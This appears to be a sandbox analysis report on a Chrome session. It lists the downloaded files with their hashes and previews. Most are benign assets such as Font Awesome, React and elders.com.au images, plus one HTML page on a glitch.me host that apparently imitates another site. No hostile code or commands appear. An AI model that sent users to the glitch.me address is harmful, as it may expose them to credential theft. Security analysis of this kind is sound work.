                                                                                                                                    SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                                    SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkG5Q0HWZ-FdxIFDVNaR8U=?alt=proto
                                                                                                                                    Preview:CgkKBw1TWkfFGgA=
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (608)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):823
                                                                                                                                    Entropy (8bit):5.079251934712805
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
                                                                                                                                    MD5:8972AE5004BC634FFA6641BE3960E78A
                                                                                                                                    SHA1:235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
                                                                                                                                    SHA-256:7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
                                                                                                                                    SHA-512:F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:TrueType Font data, 15 tables, 1st "FFTM", 46 names, Macintosh
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):219800
                                                                                                                                    Entropy (8bit):5.594013634964155
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:25HZHppYd1XyU2tUojj5jre+DX/tw9Y8NJ/W+0B7qtM:YHZHb8yU2tBDWpNJ/W+0xiM
                                                                                                                                    MD5:6A4BC039701FB94CD04C2851DEE47406
                                                                                                                                    SHA1:E770B3D29981923C54BDD5105F0BFD55029DDF74
                                                                                                                                    SHA-256:4E2F12DFCFB031A51353882E646D68D42B5D3CFB252BD9383DAFF9B924B46CE1
                                                                                                                                    SHA-512:19FEFCB40D28DC2B6CAEEC9F1B52C0574A4B0644E821BFC9EC0EDB88F18BDC6EA0A9B55E670783E7BCE107BDC1FCC617644FBC84CE70525F19BE5D2E4908F284
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Bold.cebc7f85.ttf
                                                                                                                                    Preview:...........pFFTM.>.M..Z|....GDEF.%..........GPOS.SO...P.....GSUBz.g.......!.OS/2..s<...x...`cmap.F*G.......jgasp............glyfT....#....$head..K........6hhea...~...4...$hmtx:4./........loca...6.......nmaxp...p...X... name......... .post.r.....0..,c.........5.._.<...................dO.,.....i.........................,.............................m.................@.........).........`.......`.....g..................P. {........MONO..............." .............. ...*.9.....M...........1.F...F.<.#.R.#.R.#...-...F.B.-.@.......~.-.&.-.J.-...7...-.5.-.....6.-.$.#.......-.I.2.....].-.;.-.0.A.D.A.....~.-...-...(...-.P...b.K.>.-.t.K...K...K...-.w.K.(.K.)...V.K...K.<.7.y.K...-.@.K...-.R.K.R.#.......I.?...J...<... .....#.6.K.....6...^.2.....O.#...(.2.>...-./.-...-.:...3.#.?.A...<.......B.#.D.#.8.*.9...(.2.C.1.-.e.8....._...".F...................#.......K.....2.2.....1.F...-.Q.-.....8.....K.V.-...7.B.-...#.(.....-.J.-.B.-.l.....#...-...#.x.#.O.#.".F.Z.....-.2.7.D.#...#.(.....#...#...#...<.P..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):172833
                                                                                                                                    Entropy (8bit):7.97941391640036
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:a+NHthlh12DD+/mmNTIbIhZjNf00ex5+zFwvTn7Q+SfjcwkUm6Ffdcykv:nNHtnh12DDsmpM/FwbuWw9jVkUm6Ufv
                                                                                                                                    MD5:BE3E5050811DEE216A7A83BED23ADA95
                                                                                                                                    SHA1:719F99304500468A81FDE12CFB628D6B8B44D974
                                                                                                                                    SHA-256:9EAF65CC1B0686F3C964D07DE135E84A7AAF1A46F0EBEDB4000F5A28722D54AA
                                                                                                                                    SHA-512:BB23963B3FB38F3A976D7324785BF957CA6BE322B4070B047E40B6FA612219A8D34F3100B67BCD505E8D87260E2BBBDE5F9BC41EDD1307FC747C8E84F5EF1780
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/images/homepage-banners/modern_home.jpg
                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:B60FE747488D11EEA83687A2E59320CC" xmpMM:InstanceID="xmp.iid:B60FE746488D11EEA83687A2E59320CC" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:10052fcd-6563-4e0b-8b24-de1c12001c08" stRef:documentID="adobe:docid:photoshop:1b873438-bb99-024a-8e97-98777a8fb36f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):16
                                                                                                                                    Entropy (8bit):3.625
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:UU:UU
                                                                                                                                    MD5:DD9B395C741CE2784096E26619E14910
                                                                                                                                    SHA1:D691792F378240F80919BEDA895262C509D22B75
                                                                                                                                    SHA-256:C084B47104C493FB377B6D35D8C08DF67D773F6DCF8294C0A7360710CD8CACBD
                                                                                                                                    SHA-512:BB9D8EFF819A61A9CE8BDF03336D6E0650DC5F0339843CAD9C8B96C404CA751FB797BECD4D9A1FD24AFD9D6F3FA9B86645E6E8AD8B855C032E80A4F8897B983C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:window.$CQ=_g.$;
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):137787
                                                                                                                                    Entropy (8bit):7.979539421935738
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:RkWKWJvD0r3NbIN/HiQe4gOW5qFEwKwoZmxLfENvk:RkQ4DYPiQe4PW5SEzHNvk
                                                                                                                                    MD5:1449892EFC0C94786478F6609C28125D
                                                                                                                                    SHA1:543F955354ACC99ACE29D1A25F66FC27236B4282
                                                                                                                                    SHA-256:E13BC940E002D0452E884BA843690457B75D2CC0F9FEFD66F99F0E7093A528D7
                                                                                                                                    SHA-512:452E7E2C619377774BD603437DCA84B58EC80B1A2B2978AA3169A996E9749B537E7038A0BADAF728D53D61612D5B285189A253E37002462CBD87F27153BBFCDD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/images/homepage-banners/staff_background_wheat.jpg
                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:D3DA53FA53BD11EFB156A9DD8535B747" xmpMM:InstanceID="xmp.iid:D3DA53F953BD11EFB156A9DD8535B747" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69d761ac-ac6e-4ecd-ae24-eb8e472e5d5c" stRef:documentID="adobe:docid:photoshop:6ec06c4c-7df8-ea4c-828b-fc5ea02d2e14"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1560)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1775
                                                                                                                                    Entropy (8bit):5.0855295906697
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
                                                                                                                                    MD5:A5A0C9048EFB7CB5DF90023064D09BA4
                                                                                                                                    SHA1:9669B2608D986D4742DD2C0C114B148B6CDB5CDE
                                                                                                                                    SHA-256:DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
                                                                                                                                    SHA-512:97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (56744)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1379538
                                                                                                                                    Entropy (8bit):6.021213258443914
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:m51DmAh/+YxhV1shU+hqyFGk06Ne5G+pQHD7XfIepn3EyLueml+:m5cEedJgTSHfPVulo
                                                                                                                                    MD5:834F48DCD027B791FC4978A00F1DD91E
                                                                                                                                    SHA1:E31571D71AEA186AB3FDDF5868A45C7F70EAFD3D
                                                                                                                                    SHA-256:965A7F3934C984C733D8D95F55F3265116391098A3F565A9F4BCA90A62DAFCDF
                                                                                                                                    SHA-512:5371B52C189F677846679428690E2EF6858B9F9BD22CFC95D6A70F30428149AF9C64363BA3E5EF19AA2B7F35A2B5E7787890EEE0C3017F14D3F3E48C7B641681
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title id="pageTittle"></title>. <link id="faviconPage" rel="shortcut icon" href="" type="image/x-icon">. <style>. * {. box-sizing: border-box;. margin: 0;. padding: 0;. }. body {. font-family: Arial, Helvetica, sans-serif;. width: 100%;. background-color: rgb(255, 255, 255);. overflow: hidden;. }. a {. text-decoration: none;. }. header {. display: flex;. align-items: center;. justify-content: space-between;. padding: 10px;. background: rgb(8, 90, 182);. }. img#logod {. width: 6%;. }. .flexlogo {. display: flex;. align-items: center;. gap: 1.3rem;. }. .profileLogo
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 32 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):817
                                                                                                                                    Entropy (8bit):7.602031146587345
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:N/61fBUkouE4pvW0D0g6WS3Qv3YMhoyD8x7RQS:N/6FBKgec0g63kNW
                                                                                                                                    MD5:CE273BDD7D5C78613311F31B1BC77870
                                                                                                                                    SHA1:CCAD030EC9060D5EB3CBACB77968A9ACAD13C5C9
                                                                                                                                    SHA-256:0D220766B429A80F4858F1A115F79D746D7A3D873FFBE11233E4A822C5759982
                                                                                                                                    SHA-512:011B8ABA918ED0807D82A7B98177E2F1190A2426339B5458A68DDB1E6A424CA16BABB1D22204C670FBEC7C9F1FA064AD37A8CFDB80C370FA3AC01CA13334E831
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/Livestock.png
                                                                                                                                    Preview:.PNG........IHDR... ................pHYs.................sRGB.........gAMA......a.....IDATx..VKR.@....B.O.*.&..N.>A..!'.. .....'.....,..!$U.|6...t[Ra.d.`'...x..o..g......`..'...... No...c.$.D..=S.vk..|3%....BH^.....=."......r..M..r9.-.!..#{..mB8....+..\..M8.|.x...1$$S|.e...E{.@w........DL..f..`7....Yw.._.<........Z.h.3..-... ...s.Q..v....... ..:.-}...3f.V`..n.wD. .0.P.....C.=4..tC#..Q.....n..Z$).wQ.|}........$l...e...#^]..C.-p....G....6K..m)......E%....c..{..t.m.\...=m.H:sc;)%.Y.0.wBd.....x..z.....".\/}.]p.5u ..BhH.(..2...@;....jt_.aw!.!.aX....T>.-.tk.}.q.5.o......V..|....[h.B....!...Aj...7'......p...iw/.+...R.g86.D6TD.U....F?.:2..H.U" ...P.]X..s....8..P...L.pb...2..P...uGOtu'.r7du.2.V.2.L..D... ..Pa2...6A.Z.`..@..}....CT.JS.\Tx..z.....\..Tr.....>.xP...ANi._.'....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (474)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):109931
                                                                                                                                    Entropy (8bit):4.717833542014338
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:VmjA0bi0UH0uMP5Mmhm6/mFah0nNRva1LMf4fU353ohNjN70dYq4G/ekVxQm4G0Q:YjDizH0Sah0nNR8Vs4G/BxMBQ
                                                                                                                                    MD5:05C3E7E7BA74B97802B32C6781212A24
                                                                                                                                    SHA1:90D578388B9EBFC83895B9533A9D15B8E537E108
                                                                                                                                    SHA-256:28348FEF6CB0ED8B2CEEB22DEAF824428FD13875D84C73D38F77DD216FC24E7F
                                                                                                                                    SHA-512:60523A0A168F439847F68F10E27E59CC31EB86BC19DDD860652436242FE982662E0F442D1B48B04207C56B527EA388EF925B0A06EA5C1F3E53C75CAA6B6E4515
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://unpkg.com/react@18.3.1/umd/react.development.js
                                                                                                                                    Preview:/**. * @license React. * react.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = global || self, factory(global.React = {}));.}(this, (function (exports) { 'use strict';.. var ReactVersion = '18.3.1';.. // ATTENTION. // When adding new symbols to this file,. // Please consider also adding to 'react-devtools-shared/src/backend/ReactSymbols'. // The Symbol used to tag the ReactElement-like types.. var REACT_ELEMENT_TYPE = Symbol.for('react.element');. var REACT_PORTAL_TYPE = Symbol.for('react.portal');. var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment');. var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode');. var RE
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1352)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1080227
                                                                                                                                    Entropy (8bit):4.683413687755208
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:Eb4LcitesQOUrfhl597ZRt4f/t7EQWRWqPwiQ3YaA4gSX:Eb4LcitesQOUrfhH97ZR2FEQWRWqPwi0
                                                                                                                                    MD5:3EDF0EB850CBD3326D48DD88B6C3029F
                                                                                                                                    SHA1:AB3BD02C5322C693EBE6E824BA87141E57A3A18A
                                                                                                                                    SHA-256:F9044A5E9C39DB8BB1A204DFF924E526EC0A621E695BB69DE1035811BE8709E4
                                                                                                                                    SHA-512:51D09A415EF8CA0E2DFCFCB6EBBE0B8A4253A0103474C0623DC89CB23BD626815C832EE63589453DFD585FA876B06E17BE16AA785A30FDB32C329ED9E2152048
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://unpkg.com/react-dom@18.3.1/umd/react-dom.development.js
                                                                                                                                    Preview:/**. * @license React. * react-dom.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('react')) :. typeof define === 'function' && define.amd ? define(['exports', 'react'], factory) :. (global = global || self, factory(global.ReactDOM = {}, global.React));.}(this, (function (exports, React) { 'use strict';.. var ReactSharedInternals = React.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED;.. var suppressWarning = false;. function setSuppressWarning(newSuppressWarning) {. {. suppressWarning = newSuppressWarning;. }. } // In DEV, calls to console.warn and console.error get replaced. // by calls to these methods by a Babel plugin.. //. // In PROD (or in packages without access to React internals),.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):555
                                                                                                                                    Entropy (8bit):7.377837241745018
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/7j/6Ts/CL0GLt/VSoxHaeDzxLNHGOmCvH1mF2aJVhmunTU:u/6z0GL9VSoxHN3xLNHGOzvHsFLqwTU
                                                                                                                                    MD5:109D055C7F1557CEE036E5BCF7E16030
                                                                                                                                    SHA1:2137ED0ED2E8A90FB2E0CC1458C278CD540EBEFD
                                                                                                                                    SHA-256:2E75CD7584C5561BD6CFBFF760686A093CABF74A4D8A73DC49A91C19F89D0E81
                                                                                                                                    SHA-512:65B8C35792174766DC2C6B956C0B45011E7717D17CA2E1CEDA3B2BB071B934884E58B6F024E7B095AAF8BC8E6BBA25A2417F3591062C4E9A2CD8C309B9E0C430
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR..............l;....pHYs.................sRGB.........gAMA......a.....IDATx..T1V.@..Y...Y./>..r...z.<.z...z...z...........`...q..6.H,...f....AH..N.H.8......!..2.z..b...+...S."... .Ea......i]'."..m.c...Y.....V8P.N.n.6.hds'.XD"...f..&q{.3.]..Z..l..2./.._...F,Yl...x,>.....Q..3....E.Ig..3..3\ Mw.n..-W.D...-.E....7..0....#..PovOkv.|e..6..=?...f..Qq2w,.....uo.(..!.M...v.<4..%V8$.=-.=...\B..)Pw=...'4.....(..je^..0I>xs.iWl..s..X6~.j..d...*....l...|...K..@.sH..u5.... j...=.<M......;ljID..l=-.....C,..........IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (63861)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2638418
                                                                                                                                    Entropy (8bit):5.580519911741236
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:49152:FRVXHGkpWGzBXRO3ReCbiwQ/D3hVx2SpQB80qEcPKEhVkuO6OxBmvU9ru8Xlh:Fb33983ZVxf
                                                                                                                                    MD5:2D7DF618EB528A2CE626641AACCEA776
                                                                                                                                    SHA1:2C031AA894E13DD488BCBA5A09AB4D54D41C9B8D
                                                                                                                                    SHA-256:95641DABE7575DC36270DB7D559CB68AA25A90E95E674C9390293FCE0CC98F53
                                                                                                                                    SHA-512:1310F32965731946FBFA3DC4748660B1640BB257B1950BAAF1F35E0F201DDD1A5EF158A9D34EBCFDB89AC457EE00EDEA0BB3C7930900E36BD5EBF12D8FAFE8A1
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js
                                                                                                                                    Preview:!function(e){function t(t){for(var n,u,i=t[0],c=t[1],a=t[2],p=0,s=[];p<i.length;p++)u=i[p],Object.prototype.hasOwnProperty.call(o,u)&&o[u]&&s.push(o[u][0]),o[u]=0;for(n in c)Object.prototype.hasOwnProperty.call(c,n)&&(e[n]=c[n]);for(f&&f(t);s.length;)s.shift()();return l.push.apply(l,a||[]),r()}function r(){for(var e,t=0;t<l.length;t++){for(var r=l[t],n=!0,i=1;i<r.length;i++){var c=r[i];0!==o[c]&&(n=!1)}n&&(l.splice(t--,1),e=u(u.s=r[0]))}return e}var n={},o={1:0},l=[];function u(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,u),r.l=!0,r.exports}u.m=e,u.c=n,u.d=function(e,t,r){u.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},u.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},u.t=function(e,t){if(1&t&&(e=u(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var r=Object.create(nul
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2
                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                    MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                    SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                    SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                    SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:{}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2407
                                                                                                                                    Entropy (8bit):4.120800107455978
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:n/vg2rGKrPgxrL3XAeUKTkIw90vtRZpJmWkuFFB5i7AF2:ng2rGTrs9bB9qRqQ5wAF2
                                                                                                                                    MD5:81A61FA6DF91240A8C0DA8CFA1F205B7
                                                                                                                                    SHA1:4DDC78DF7F4C442C36A48ED13DE319CCD33EBCE2
                                                                                                                                    SHA-256:1DCBAB25EF09241FAABB74D0A891609A992CF8A4A51D4715FD8909EF490FB27B
                                                                                                                                    SHA-512:A4F8C7C6794CFE39004924E7A67B22044608818B2E28B7C5150748F0CB77F615279587616E9C2B8F343D256EB641A6EE4F68ADC9E447AEE99BA04763F1C6A993
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7.05268 17.8536 7.14645C17.9473 7.24021 18 7.36739 18 7.5V16.5C18 16.6326 17.9473 16.7598 17.8536 16.8536C17.7598 16.9473 17.6326 17 17.5 17H9.5C9.36739 17 9.24021 16.9473 9.14645 16.8536C9.05268 16.7598 9 16.6326 9 16.5V14.5C9 14.3674 8.94732 14.2402 8.85355 14.1464C8.75979 14.0527 8.63261 14 8.5 14C8.36739 14 8.24021 14.0527 8.14645 14.1464C8.05268 14.2402 8 14.3674 8 14.5V16.5C8 16.8978 8.15804 17.2794 8.43934 17.5607C8.72064 17.842 9.10218 18 9.5 18H17.5C17.8978 18 18.2794 17.842 18.5607 17.5607C18.842 17.2794 19 16.8978 19 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 152 x 66, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2918
                                                                                                                                    Entropy (8bit):7.907716853116308
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:g/6on79OskwFLow7j3R2/wsq90BcZzPnwbD5R4ilCJHd3zXS0dtd+jzOcLnd:gSLstFEwn0/xqqBctobQiUHd3zXSg+jn
                                                                                                                                    MD5:AED2CCE0BEA27C8E648B826838FF36DB
                                                                                                                                    SHA1:2D7713543D84113EBEA24D61653224560A9DF1E2
                                                                                                                                    SHA-256:748181DAB74B0ED8BA83CE218F97B0F1B325C2C61560C5CB8AE76EE26DEAC339
                                                                                                                                    SHA-512:A4D2E71883E22331A7B3C5EC4883C6E311D63854F2A11A5CA76667F9C51DC826F9A48F2834D2ABB5C4FE5181A7807319B474EDD1ED34C35D2DEDA3154FA715B0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/logos/Red_logo.png
